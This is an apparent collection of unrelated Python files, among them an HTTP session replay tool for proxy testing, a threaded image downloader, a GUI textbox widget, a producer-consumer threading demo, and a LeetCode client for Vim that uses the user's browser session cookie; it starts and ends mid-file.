def run_process(process_args: List):
"""
Runs a python process and prints the stderr to the current console
Args:
process_args: The args to pass through to the process
"""
process = Popen(process_args, stderr=PIPE, universal_newlines=True)
while True:
line = process.stderr.readline()
if line:
print(line.strip())
if process.poll() is not None:
break
if __name__ == "__main__":
"""
Master script to boot either the server or optimiser or both
"""
parser = argparse.ArgumentParser(description='Boot the TSO servers')
parser.add_argument('username', type=str,
help='The username used for the Tesla API')
parser.add_argument('--server', action='store_true',
help='Boot the monitoring web server')
parser.add_argument('--optimiser', action='store_true',
help='Boot the optimiser controller')
parser.add_argument('--comm-type', type=str,
help='The type of communication between processors LOCAL, DATASTORE, CLOUD_STORAGE')
args = parser.parse_args()
if not args.server and not args.optimiser:
print("You must run the --optimiser or the --server or both.")
exit(-1)
# Boot each process in a new thread, so we can print all output from all processes to this console
threads = []
if args.optimiser:
thread_1 = threading.Thread(target=run_process, args=(['python', 'optimiser.py', args.username],))
thread_1.start()
threads.append(thread_1)
if args.server:
thread_2 = threading.Thread(target=run_process, args=(['python', 'server.py'],))
thread_2.start()
threads.append(thread_2)
for thread in threads:
thread.join()
print("Exiting...")
|
NonSSL.py
|
#!/bin/env python3
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import requests
import os
from threading import Thread
import sys
from multiprocessing import current_process
import sessionvalidation.sessionvalidation as sv
import lib.result as result
import extractHeader
import mainProcess
import json
import gzip
bSTOP = False
def createDummyBodywithLength(numberOfbytes):
if numberOfbytes <= 0:
return None
body = 'a'
while numberOfbytes != 1:
body += 'b'
numberOfbytes -= 1
return body
def handleResponse(response, *args, **kwargs):
print(response.status_code)
# resp=args[0]
#expected_output_split = resp.getHeaders().split('\r\n')[ 0].split(' ', 2)
#expected_output = (int(expected_output_split[1]), str( expected_output_split[2]))
#r = result.Result(session_filename, expected_output[0], response.status_code)
# print(r.getResultString(colorize=True))
# make sure len of the message body is greater than length
def gen():
yield 'pforpersia,champaignurbana'.encode('utf-8')
yield 'there'.encode('utf-8')
def txn_replay(session_filename, txn, proxy, result_queue, request_session):
""" Replays a single transaction
:param request_session: has to be a valid requests session"""
req = txn.getRequest()
resp = txn.getResponse()
# Construct HTTP request & fire it off
txn_req_headers = req.getHeaders()
txn_req_headers_dict = extractHeader.header_to_dict(txn_req_headers)
txn_req_headers_dict['Content-MD5'] = txn._uuid # used as unique identifier
if 'body' in txn_req_headers_dict:
del txn_req_headers_dict['body']
#print("Replaying session")
try:
# response = request_session.request(extractHeader.extract_txn_req_method(txn_req_headers),
# 'http://' + extractHeader.extract_host(txn_req_headers) + extractHeader.extract_GET_path(txn_req_headers),
# headers=txn_req_headers_dict,stream=False) # making stream=False raises contentdecoding exception? kill me
method = extractHeader.extract_txn_req_method(txn_req_headers)
response = None
body = None
content = None
if 'Transfer-Encoding' in txn_req_headers_dict:
# deleting the host key, since the STUPID post/get functions are going to add host field anyway, so there will be multiple host fields in the header
# This confuses the ATS and it returns 400 "Invalid HTTP request". I don't believe this
# BUT, this is not a problem if the data is not chunked encoded.. Strange, huh?
del txn_req_headers_dict['Host']
if 'Content-Length' in txn_req_headers_dict:
#print("ewww !")
del txn_req_headers_dict['Content-Length']
body = gen()
if 'Content-Length' in txn_req_headers_dict:
nBytes = int(txn_req_headers_dict['Content-Length'])
body = createDummyBodywithLength(nBytes)
#print("request session is",id(request_session))
if method == 'GET':
r1 = request_session.request('GET', 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content # byte array
#print("len: {0} received {1}".format(responseHeaders['Content-Length'], responseContent))
elif method == 'POST':
r1 = request_session.request('POST', 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content
#print("len: {0} received {1}".format(responseHeaders['Content-Length'], responseContent))
elif method == 'HEAD':
r1 = request_session.request('HEAD', 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content
else: # EXPERIMENTAL
r1 = request_session.request(method, 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content
#gzip_file = gzip.GzipFile(fileobj=responseContent)
#shutil.copyfileobj(gzip_file, f)
expected = extractHeader.responseHeader_to_dict(resp.getHeaders())
# print("------------EXPECTED-----------")
# print(expected)
# print("------------RESP--------------")
# print(responseHeaders)
# print()
if mainProcess.verbose:
expected_output_split = resp.getHeaders().split('\r\n')[0].split(' ', 2)
expected_output = (int(expected_output_split[1]), str(expected_output_split[2]))
r = result.Result(session_filename, expected_output[0], r1.status_code, responseContent)
b_res, res = r.getResult(responseHeaders, expected, colorize=True)
print(res)
if not b_res:
print("Received response")
print(responseHeaders)
print("Expected response")
print(expected)
# result_queue.put(r)
except UnicodeEncodeError as e:
# these unicode errors are due to the interaction between Requests and our wiretrace data.
# TODO fix
print("UnicodeEncodeError exception")
except requests.exceptions.ContentDecodingError as e:
print("ContentDecodingError", e)
except:
e = sys.exc_info()
print("ERROR in NonSSLReplay: ", e, response, session_filename)
def session_replay(input, proxy, result_queue):
global bSTOP
''' Replay all transactions in session
This entire session will be replayed in one requests.Session (so one socket / TCP connection)'''
# if timing_control:
# time.sleep(float(session._timestamp)) # allow other threads to run
while bSTOP == False:
for session in iter(input.get, 'STOP'):
# print(bSTOP)
if session == 'STOP':
print("Queue is empty")
bSTOP = True
break
with requests.Session() as request_session:
request_session.proxies = proxy
for txn in session.getTransactionIter():
try:
txn_replay(session._filename, txn, proxy, result_queue, request_session)
except:
e = sys.exc_info()
print("ERROR in replaying: ", e, txn.getRequest().getHeaders())
bSTOP = True
#print("Queue is empty")
input.put('STOP')
break
def client_replay(input, proxy, result_queue, nThread):
Threads = []
for i in range(nThread):
t = Thread(target=session_replay, args=[input, proxy, result_queue])
t.start()
Threads.append(t)
for t1 in Threads:
t1.join()
|
08_赠送.py
|
"""
pip3 install requests
"""
import threading
import requests
import uuid
url_list = [
'https://www3.autoimg.cn/newsdfs/g28/M05/F9/98/120x90_0_autohomecar__ChsEnluQmUmARAhAAAFES6mpmTM281.jpg',
'https://www2.autoimg.cn/newsdfs/g28/M09/FC/06/120x90_0_autohomecar__ChcCR1uQlD6AT4P3AAGRMJX7834274.jpg',
'https://www2.autoimg.cn/newsdfs/g3/M00/C6/A9/120x90_0_autohomecar__ChsEkVuPsdqAQz3zAAEYvWuAspI061.jpg',
]
def task(url):
"""
1. DNS解析,根据域名解析出IP
2. 创建socket客户端 sk = socket.socket()
3. 向服务端发起连接请求 sk.connect()
4. 发送数据(我要图片) sk.send(...)
5. 接收数据 sk.recv(8096)
接收到数据后写入文件。
"""
ret = requests.get(url)
file_name = str(uuid.uuid4()) + '.jpg'
with open(file_name, mode='wb') as f:
f.write(ret.content)
for url in url_list:
t = threading.Thread(target=task, args=(url,))
t.start()
|
textbox.py
|
import copy
import time
from threading import Thread
from ..graphics import Color
from .component import Component
from .panel import Panel
from .label import Label
from .layout import Relative
class Textbox(Component):
"""@brief Box for users to type text into.
"""
def __init__(self, controller, num_chars: int=15, parent: Component=None, z: int=0):
Component.__init__(self, controller, parent, z)
# textbox specific details
self.num_chars = num_chars
self.typing = False
self.cursor_active = False
self.cursor_rate = 0.5
self.background = Color['white']
self.foreground = Color['black']
self.font = self.controller.font['large']
# textbox made with a panel
self.panel = Panel(self.controller, parent=self)
# typed text goes into the label
self.label = Label(self.controller, self.text, parent=self)
# set size to be arbitrarily wide
self.width, self.height = self.font.size('o' * self.num_chars)
self.current_width = self.font.size(self.label.text)[0]
# have a flashing cursor
self.cursor_char = '|'
self.cursor_offset = 3
self.cursor_width = self.font.size(self.cursor_char)[0]
self.cursor_label = Label(self.controller, self.cursor_char)
self.cursor_label.visible = False
def load(self):
"""@brief Load all subcomponents of textbox.
"""
self.set_anchor()
# load panel
self.panel.anchor = self.anchor
self.panel.loc = self.loc
self.panel.background = self.background
self.panel.width = self.width
self.panel.height = self.height
self.panel.load()
# update the label with button's members
self.center_layout = Relative(self.panel)
self.label.loc = self.center_layout.northwest
self.label.text = self.text
self.label.font = self.font
self.label.foreground = self.foreground
self.label.background = None
self.label.load()
# keep the cursor on the far right of the text
w = self.label.font.size(self.label.text)[0]
self.cursor_label.loc = self.center_layout.northwest
cursor_x_offset = self.cursor_label.loc[0] + w - self.cursor_width / self.cursor_offset
self.cursor_label.loc = (cursor_x_offset, self.cursor_label.loc[1])
self.cursor_label.font = self.font
self.cursor_label.foreground = self.foreground
self.cursor_label.background = None
self.cursor_label.load()
def refresh_actions(self):
"""@brief Every frame, check if typing is occurring.
If it is, load text from the controller's keyboard,
and handle cursor flashing.
"""
# typing setup
if self.focused and not self.typing:
self.controller.keyboard.typing = True
self.typing = True
self.controller.keyboard.typed_text = copy.copy(self.text)
# when the user is typing
if self.focused and self.typing:
# determine if the width of the text is wider than textbox's width
new_width = self.font.size(self.controller.keyboard.typed_text)[0]
# remove the new character if there is no room left
if new_width > self.width:
self.controller.keyboard.typed_text = self.controller.keyboard.typed_text[:-1]
# update text because there is room
else:
self.text = copy.copy(self.controller.keyboard.typed_text)
self.current_width = self.font.size(self.text)[0]
self.load()
# start/stop typing
self.typing = self.focused
# setup cursor flashing
if self.typing and not self.cursor_active:
self.cursor_active = True
Thread(target=self.flash_cursor, daemon=True).start()
def draw(self):
"""@brief Refresh all subcomponents after typing has been checked.
"""
self.panel.refresh()
self.label.refresh()
self.cursor_label.refresh()
def flash_cursor(self):
"""@brief Running and close down of cursor flashing.
"""
while self.typing:
self.cursor_label.visible = not self.cursor_label.visible
time.sleep(self.cursor_rate)
# stop the cursor flashing when it should not be
if not self.controller.keyboard.typing:
self.focused = False
break
# reset the cursor state to be gone
self.cursor_active = False
self.cursor_label.visible = False
|
produtor_consumidor.py
|
from threading import Thread, Condition
from time import sleep
import random
from random import randint
import sys
import argparse
import string
import logging
# ---- #
logging.basicConfig(level=logging.DEBUG,
format='> %(threadName)-9s: %(message)s',)
# ---- #
parser = argparse.ArgumentParser(
description="Modelagem do problema Produtor-Consumidor em Python")
parser.add_argument('-bs', dest="buffersize", metavar="Buffer Size", type=int, default=10,
help="Número inteiro que define tamanho do buffer. O tamanho padrão é 10.")
parser.add_argument('-pn', dest="producersnumber", metavar="Producer Number", type=int, default=1,
help="Número inteiro que define a quantidade de threads produtoras. O número padrão é 1.")
parser.add_argument('-cn', dest="consumersnumber", metavar="Consumer Number", type=int, default=1,
help="Número inteiro que define a quantidade de threads consumidoras. O número padrão é 1.")
parser.add_argument('-pr', dest="producingrate", metavar="Producing Rate", type=int, default=0,
help="Taxa de produção de recurso das threads produtoras. Ou seja, quanto de recurso as threads produtoras produzirão de cada vez. O número padrão é aleatório.")
parser.add_argument('-pt', dest="producertime", metavar="Producer Time", type=int, default=1,
help="Número inteiro que define o tempo (em segundos) entre as produções de recursos das threads produtoras. O tempo padrão é 1s.")
parser.add_argument('-ct', dest="consumertime", metavar="Consumer Time", type=int, default=2,
help="Número inteiro que define o tempo (em segundos) entre os consumos de recursos das threads consumidoras. O tempo padrão é 2s.")
parser.add_argument('-v', '--verbose', action="count",
help="Aumenta verbosidade de saída.")
args = parser.parse_args()
# ---- #
buffer_size = args.buffersize
producer_number = args.producersnumber
consumer_number = args.consumersnumber
producing_rate = args.producingrate
producer_time = args.producertime
consumer_time = args.consumertime
verbosity = args.verbose
# ---- #
class Buffer:
def __init__(self, capacidade):
self.buffer = []
self.capacidade = capacidade
def estoque(self):
cont = 0
for x in range(len(self.buffer)):
cont += 1
return cont
def produz(self, itens):
if verbosity > 1:
logging.debug(f'Adicionando {len(itens)} item(ns) ao buffer...')
for i in range(len(itens)):
self.buffer.append(itens[i])
sleep(producer_time)
if verbosity:
logging.debug(
f'{len(itens)} item(ns) adicionado(s)! | {itens} | Estoque do buffer: {self.estoque()}/{self.capacidade}')
else:
logging.debug(
f'{len(itens)} item(ns) adicionado(s)! | Estoque do buffer: {self.estoque()}/{self.capacidade}')
sleep(producer_time)
def consome(self, item):
if verbosity > 1:
logging.debug('Consumindo item do buffer...')
self.buffer.remove(item)
sleep(consumer_time)
logging.debug(
f'Item {item} consumido! | Estoque do buffer: {self.estoque()}/{self.capacidade}')
sleep(consumer_time)
# ---- #
def produtor(bufr, mutx, itens_lst):
logging.debug('Thread produtora iniciada...')
sleep(3)
while True:
mutx.acquire()
if bufr.estoque() < bufr.capacidade:
if verbosity > 1:
logging.debug(
'Produzindo e tornando item(ns) disponível(is)...')
itens = []
quant = producing_rate
if quant == 0:
while True:
quant = randint(1, bufr.capacidade)
if bufr.estoque() + quant < bufr.capacidade:
break
if not bufr.estoque() + quant > bufr.capacidade:
for x in range(quant):
itens.append(random.choice(itens_lst))
bufr.produz(itens)
else:
logging.debug('Estoque cheio! Thread produtora dormindo...')
mutx.wait()
if verbosity > 1:
logging.debug('Notificando todos os consumidores')
mutx.notifyAll()
mutx.release()
sleep(producer_time)
def consumidor(bufr, mutx):
logging.debug('Thread consumidora iniciada...')
sleep(3)
while True:
mutx.acquire()
if bufr.estoque() == 0:
logging.debug(
'Estoque vazio! Thread produtora dormindo / aguardando recursos...')
mutx.wait()
else:
bufr.consome(random.choice(bufr.buffer))
if verbosity > 1:
logging.debug('Notificando todos os produtores')
mutx.notifyAll()
mutx.release()
sleep(consumer_time)
# ---- #
if __name__ == "__main__":
print(".::Programa em Python que modela o problema Produtor-Consumidor::.")
if len(sys.argv) < 2:
print("- Este programa possui argumentos!")
print("- Para mais informações, execute: produtor_consumidor.py --help")
print()
print("Valores iniciais:")
print(f"\t> Número de Threads Produtoras: {producer_number}")
print(f"\t> Número de Threads Consumidoras: {consumer_number}")
print(
f"\t> Taxa de Produção: {producing_rate if producing_rate > 0 else 'Aleatório (entre 1 e a capacidade do buffer)'}")
print(f"\t> Delay das Threads Produtoras: {producer_time}")
print(f"\t> Delay das Threads Consumidoras: {consumer_time}")
print(f"\t> Nível verborrágico: {verbosity}")
print()
continuar = input('Continuar? [S/n]: ')
if continuar not in 'sS':
sys.exit()
print()
itens = list(string.ascii_uppercase)
buff = Buffer(buffer_size)
mutex = Condition()
producer_threads = []
consumer_threads = []
for prodn in range(producer_number):
thrdName = 'Produtor {} '.format(prodn+1)
producer_threads.append(
Thread(target=produtor, name=thrdName, args=(buff, mutex, itens)))
producer_threads[prodn].start()
sleep(2)
for consn in range(consumer_number):
thrdName = 'Consumidor {}'.format(consn+1)
consumer_threads.append(
Thread(target=consumidor, name=thrdName, args=(buff, mutex)))
consumer_threads[consn].start()
sleep(2)
# Opcional:
# for p in range(producer_number):
# producer_threads[p].join()
# for c in range(consumer_threads):
# consumer_threads[c].join()
|
leetcode.py
|
import json
import logging
import re
import time
import os
import pickle
from threading import Semaphore, Thread, current_thread
try:
from bs4 import BeautifulSoup
import requests
inited = 1
except ImportError:
inited = 0
try:
import vim
except ImportError:
vim = None
try:
import browser_cookie3
except ImportError:
browser_cookie3 = None
try:
import keyring
except ImportError:
keyring = None
LC_BASE = os.environ['LEETCODE_BASE_URL']
LC_CSRF = LC_BASE + '/ensure_csrf/'
LC_LOGIN = LC_BASE + '/accounts/login/'
LC_GRAPHQL = LC_BASE + '/graphql'
LC_CATEGORY_PROBLEMS = LC_BASE + '/api/problems/{category}'
LC_PROBLEM = LC_BASE + '/problems/{slug}/description'
LC_TEST = LC_BASE + '/problems/{slug}/interpret_solution/'
LC_SUBMIT = LC_BASE + '/problems/{slug}/submit/'
LC_SUBMISSIONS = LC_BASE + '/api/submissions/{slug}'
LC_SUBMISSION = LC_BASE + '/submissions/detail/{submission}/'
LC_CHECK = LC_BASE + '/submissions/detail/{submission}/check/'
LC_PROBLEM_SET_ALL = LC_BASE + '/problemset/all/'
LC_PROGRESS_ALL = LC_BASE + '/api/progress/all/'
EMPTY_FREQUENCIES = [0, 0, 0, 0, 0, 0, 0, 0]
session = None
task_running = False
task_done = False
task_trigger = Semaphore(0)
task_name = ''
task_input = None
task_progress = ''
task_output = None
task_err = ''
log = logging.getLogger(__name__)
log.setLevel(logging.ERROR)
def enable_logging():
out_hdlr = logging.FileHandler('leetcode-vim.log')
out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s'))
out_hdlr.setLevel(logging.INFO)
log.addHandler(out_hdlr)
log.setLevel(logging.INFO)
def _make_headers():
assert is_login()
headers = {'Origin': LC_BASE,
'Referer': LC_BASE,
'X-Requested-With': 'XMLHttpRequest',
'X-CSRFToken': session.cookies.get('csrftoken', '')}
return headers
def _level_to_name(level):
if level == 1:
return 'Easy'
if level == 2:
return 'Medium'
if level == 3:
return 'Hard'
return ' '
def _state_to_flag(state):
if state == 'ac':
return 'X'
if state == 'notac':
return '?'
return ' '
def _status_to_name(status):
if status == 10:
return 'Accepted'
if status == 11:
return 'Wrong Answer'
if status == 12:
return 'Memory Limit Exceeded'
if status == 13:
return 'Output Limit Exceeded'
if status == 14:
return 'Time Limit Exceeded'
if status == 15:
return 'Runtime Error'
if status == 16:
return 'Internal Error'
if status == 20:
return 'Compile Error'
if status == 21:
return 'Unknown Error'
return 'Unknown State'
def _break_code_lines(s):
return s.replace('\r\n', '\n').replace('\xa0', ' ').split('\n')
def _break_paragraph_lines(s):
lines = _break_code_lines(s)
result = []
# reserve one and only one empty line between two non-empty lines
for line in lines:
if line.strip() != '': # a line with only whitespaces is also empty
result.append(line)
result.append('')
return result
def _remove_description(code):
eod = code.find('[End of Description]')
if eod == -1:
return code
eol = code.find('\n', eod)
if eol == -1:
return ''
return code[eol+1:]
def is_login():
return session and 'LEETCODE_SESSION' in session.cookies
def get_progress():
headers = _make_headers()
res = session.get(LC_PROGRESS_ALL, headers=headers)
if res.status_code != 200:
_echoerr('cannot get the progress')
return None
data = res.json()
if 'solvedTotal' not in data:
return None
return data
def load_session_cookie(browser):
if browser_cookie3 is None:
_echoerr('browser_cookie3 not installed: pip3 install browser_cookie3 --user')
return False
if keyring is None:
_echoerr('keyring not installed: pip3 install keyring --user')
return False
session_cookie_raw = keyring.get_password('leetcode.vim', 'SESSION_COOKIE')
if session_cookie_raw is None:
cookies = getattr(browser_cookie3, browser)(domain_name='leetcode.com')
for cookie in cookies:
if cookie.name == 'LEETCODE_SESSION':
session_cookie = cookie
session_cookie_raw = pickle.dumps(cookie, protocol=0).decode('utf-8')
break
else:
_echoerr('Leetcode session cookie not found. Please login in browser.')
return False
keyring.set_password('leetcode.vim', 'SESSION_COOKIE', session_cookie_raw)
else:
session_cookie = pickle.loads(session_cookie_raw.encode('utf-8'))
global session
session = requests.Session()
session.cookies.set_cookie(session_cookie)
progress = get_progress()
if progress is None:
_echoerr('cannot get progress. Please relogin in your browser.')
keyring.delete_password('leetcode.vim', 'SESSION_COOKIE')
return False
return True
def _get_category_problems(category):
headers = _make_headers()
url = LC_CATEGORY_PROBLEMS.format(category=category)
log.info('_get_category_problems request: url="%s" headers="%s"',
url, headers)
res = session.get(url, headers=headers)
log.info('_get_category_problems response: status="%s" body="%s"',
res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the category: {}'.format(category))
return []
problems = []
content = res.json()
for p in content['stat_status_pairs']:
# skip hidden questions
if p['stat']['question__hide']:
continue
problem = {'state': _state_to_flag(p['status']),
'id': p['stat']['question_id'],
'fid': p['stat']['frontend_question_id'],
'title': p['stat']['question__title'],
'slug': p['stat']['question__title_slug'],
'paid_only': p['paid_only'],
'ac_rate': p['stat']['total_acs'] / p['stat']['total_submitted'],
'level': _level_to_name(p['difficulty']['level']),
'favor': p['is_favor'],
'category': content['category_slug'],
'frequency': p['frequency']}
problems.append(problem)
return problems
def get_problems(categories):
assert is_login()
problems = []
for c in categories:
problems.extend(_get_category_problems(c))
return sorted(problems, key=lambda p: p['id'])
def _split(s):
if isinstance(s, list):
lines = []
for element in s:
lines.extend(_split(element))
return lines
# Replace all \r\n to \n and all \r (alone) to \n
s = s.replace('\r\n', '\n').replace('\r', '\n').replace('\0', '\n')
# str.split has an disadvantage that ''.split('\n') results in [''], but what we want
# is []. This small function returns [] if `s` is a blank string, that is, containing no
# characters other than whitespaces.
if s.strip() == '':
return []
return s.split('\n')
def get_problem(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'query': '''query getQuestionDetail($titleSlug : String!) {
question(titleSlug: $titleSlug) {
questionId
title
content
stats
difficulty
codeDefinition
sampleTestCase
enableRunCode
translatedContent
}
}''',
'variables': {'titleSlug': slug},
'operationName': 'getQuestionDetail'}
log.info('get_problem request: url="%s" headers="%s" body="%s"', LC_GRAPHQL, headers, body)
res = session.post(LC_GRAPHQL, json=body, headers=headers)
log.info('get_problem response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the problem: {}'.format(slug))
return None
q = res.json()['data']['question']
content = q['translatedContent'] or q['content']
if content is None:
_echoerr('cannot get the problem: {}'.format(slug))
return None
soup = BeautifulSoup(content, features='html.parser')
problem = {}
problem['id'] = q['questionId']
problem['title'] = q['title']
problem['slug'] = slug
problem['level'] = q['difficulty']
problem['desc'] = _break_paragraph_lines(soup.get_text())
problem['templates'] = {}
for t in json.loads(q['codeDefinition']):
problem['templates'][t['value']] = _break_code_lines(t['defaultCode'])
problem['testable'] = q['enableRunCode']
problem['testcase'] = _split(q['sampleTestCase'])
stats = json.loads(q['stats'])
problem['total_accepted'] = stats['totalAccepted']
problem['total_submission'] = stats['totalSubmission']
problem['ac_rate'] = stats['acRate']
return problem
def _check_result(submission_id):
global task_progress
if _in_task():
prog_stage = 'Uploading '
prog_bar = '.'
task_progress = prog_stage + prog_bar
while True:
headers = _make_headers()
url = LC_CHECK.format(submission=submission_id)
log.info('check result request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('check result response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot get the execution result')
return None
if _in_task():
prog_bar += '.'
r = res.json()
if r['state'] == 'SUCCESS':
prog_stage = 'Done '
break
elif r['state'] == 'PENDING':
prog_stage = 'Pending '
elif r['state'] == 'STARTED':
prog_stage = 'Running '
if _in_task():
task_progress = prog_stage + prog_bar
time.sleep(1)
result = {
'answer': r.get('code_answer', []),
'runtime': r['status_runtime'],
'state': _status_to_name(r['status_code']),
'testcase': _split(r.get('input', r.get('last_testcase', ''))),
'passed': r.get('total_correct') or 0,
'total': r.get('total_testcases') or 0,
'error': _split([v for k, v in r.items() if 'error' in k and v])
}
# the keys differs between the result of testing the code and submitting it
# for submission judge_type is 'large', and for testing judge_type does not exist
if r.get('judge_type') == 'large':
result['answer'] = _split(r.get('code_output', ''))
result['expected_answer'] = _split(r.get('expected_output', ''))
result['stdout'] = _split(r.get('std_output', ''))
result['runtime_percentile'] = r.get('runtime_percentile', '')
else:
# Test states cannot distinguish accepted answers from wrong answers.
if result['state'] == 'Accepted':
result['state'] = 'Finished'
result['stdout'] = _split(r.get('code_output', []))
result['expected_answer'] = []
result['runtime_percentile'] = r.get('runtime_percentile', '')
result['expected_answer'] = r.get('expected_code_answer', [])
return result
def test_solution(problem_id, title, slug, filetype, code, test_input):
assert is_login()
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': test_input,
'lang': filetype,
'question_id': str(problem_id),
'test_mode': False,
'typed_code': code}
url = LC_TEST.format(slug=slug)
log.info('test solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('test solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot test the solution for ' + slug)
return None
result = _check_result(res.json()['interpret_id'])
result['testcase'] = test_input.split('\n')
result['title'] = title
return result
def test_solution_async(problem_id, title, slug, filetype, code, test_input):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
code = _remove_description(code)
task_name = 'test_solution'
task_input = [problem_id, title, slug, filetype, code, test_input]
task_trigger.release()
return True
def submit_solution(slug, filetype, code=None):
assert is_login()
problem = get_problem(slug)
if not problem:
return None
if code is None:
code = '\n'.join(vim.current.buffer)
code = _remove_description(code)
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
body = {'data_input': problem['testcase'],
'lang': filetype,
'question_id': str(problem['id']),
'test_mode': False,
'typed_code': code,
'judge_type': 'large'}
url = LC_SUBMIT.format(slug=slug)
log.info('submit solution request: url="%s" headers="%s" body="%s"', url, headers, body)
res = session.post(url, json=body, headers=headers)
log.info('submit solution response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
if 'too fast' in res.text:
_echoerr('you are sending the request too fast')
else:
_echoerr('cannot submit the solution for ' + slug)
return None
result = _check_result(res.json()['submission_id'])
result['title'] = problem['title']
return result
def submit_solution_async(slug, filetype, code=None):
assert is_login()
global task_input, task_name
if task_running:
_echoerr('there is other task running: ' + task_name)
return False
if code is None:
code = '\n'.join(vim.current.buffer)
task_name = 'submit_solution'
task_input = [slug, filetype, code]
task_trigger.release()
return True
def get_submissions(slug):
assert is_login()
headers = _make_headers()
headers['Referer'] = LC_PROBLEM.format(slug=slug)
url = LC_SUBMISSIONS.format(slug=slug)
log.info('get submissions request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submissions response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submissions of problem: ' + slug)
return None
submissions = []
for r in res.json()['submissions_dump']:
s = {
'id': r['url'].split('/')[3],
'time': r['time'].replace('\xa0', ' '),
'status': r['status_display'],
'runtime': r['runtime'],
}
submissions.append(s)
return submissions
def _group1(match, default):
if match:
return match.group(1)
return default
def _unescape(s):
return s.encode().decode('unicode_escape')
def get_submission(sid):
assert is_login()
headers = _make_headers()
url = LC_SUBMISSION.format(submission=sid)
log.info('get submission request: url="%s" headers="%s"', url, headers)
res = session.get(url, headers=headers)
log.info('get submission response: status="%s" body="%s"', res.status_code, res.text)
if res.status_code != 200:
_echoerr('cannot find the submission: ' + sid)
return None
# we need to parse the data from the Javascript snippet
s = res.text
submission = {
'id': sid,
'state': _status_to_name(int(_group1(re.search(r"status_code: parseInt\('([^']*)'", s),
'not found'))),
'runtime': _group1(re.search("runtime: '([^']*)'", s), 'not found'),
'passed': _group1(re.search("total_correct : '([^']*)'", s), 'not found'),
'total': _group1(re.search("total_testcases : '([^']*)'", s), 'not found'),
'testcase': _split(_unescape(_group1(re.search("input : '([^']*)'", s), ''))),
'answer': _split(_unescape(_group1(re.search("code_output : '([^']*)'", s), ''))),
'expected_answer': _split(_unescape(_group1(re.search("expected_output : '([^']*)'", s),
''))),
'problem_id': _group1(re.search("questionId: '([^']*)'", s), 'not found'),
'slug': _group1(re.search("editCodeUrl: '([^']*)'", s), '///').split('/')[2],
'filetype': _group1(re.search("getLangDisplay: '([^']*)'", s), 'not found'),
'error': [],
'stdout': [],
}
problem = get_problem(submission['slug'])
submission['title'] = problem['title']
# the punctuations and newlines in the code are escaped like '\\u0010' ('\\' => real backslash)
# to unscape the string, we do the trick '\\u0010'.encode().decode('unicode_escape') ==> '\n'
# submission['code'] = _break_code_lines(_unescape(_group1(
# re.search("submissionCode: '([^']*)'", s), '')))
submission['code'] = _unescape_with_Chinese(
_group1(re.search("submissionCode: '([^']*)'", s), ''))
dist_str = _unescape(_group1(re.search("runtimeDistributionFormatted: '([^']*)'", s),
'{"distribution":[]}'))
dist = json.loads(dist_str)['distribution']
dist.reverse()
# the second key "runtime" is the runtime in milliseconds
# we need to search from the position after the first "runtime" key
prev_runtime = re.search("runtime: '([^']*)'", s)
if not prev_runtime:
my_runtime = 0
else:
my_runtime = int(_group1(re.search("runtime: '([^']*)'", s[prev_runtime.end():]), 0))
accum = 0
for runtime, frequency in dist:
accum += frequency
if my_runtime >= int(runtime):
break
submission['runtime_percentile'] = '{:.1f}%'.format(accum)
return submission
def _process_topic_element(topic):
return {'topic_name': topic.find(class_='text-gray').string.strip(),
'num_problems': topic.find(class_='badge').string,
'topic_slug': topic.get('href').split('/')[2]}
def _process_company_element(company):
return {'company_name': company.find(class_='text-gray').string.strip(),
'num_problems': company.find(class_='badge').string,
'company_slug': company.get('href').split('/')[2]}
def get_topics_and_companies():
headers = _make_headers()
log.info('get_topics_and_companies request: url="%s', LC_PROBLEM_SET_ALL)
res = session.get(LC_PROBLEM_SET_ALL, headers=headers)
log.info('get_topics_and_companies response: status="%s" body="%s"', res.status_code,
res.text)
if res.status_code != 200:
_echoerr('cannot get topics')
return []
soup = BeautifulSoup(res.text, features='html.parser')
topic_elements = soup.find_all(class_='sm-topic')
topics = [_process_topic_element(topic) for topic in topic_elements]
company_elements = soup.find_all(class_='sm-company')
companies = [_process_company_element(company) for company in company_elements]
return {
'topics': topics,
'companies': companies
}
def get_problems_of_topic(topic_slug):
request_body = {
'operationName':'getTopicTag',
'variables': {'slug': topic_slug},
'query': '''query getTopicTag($slug: String!) {
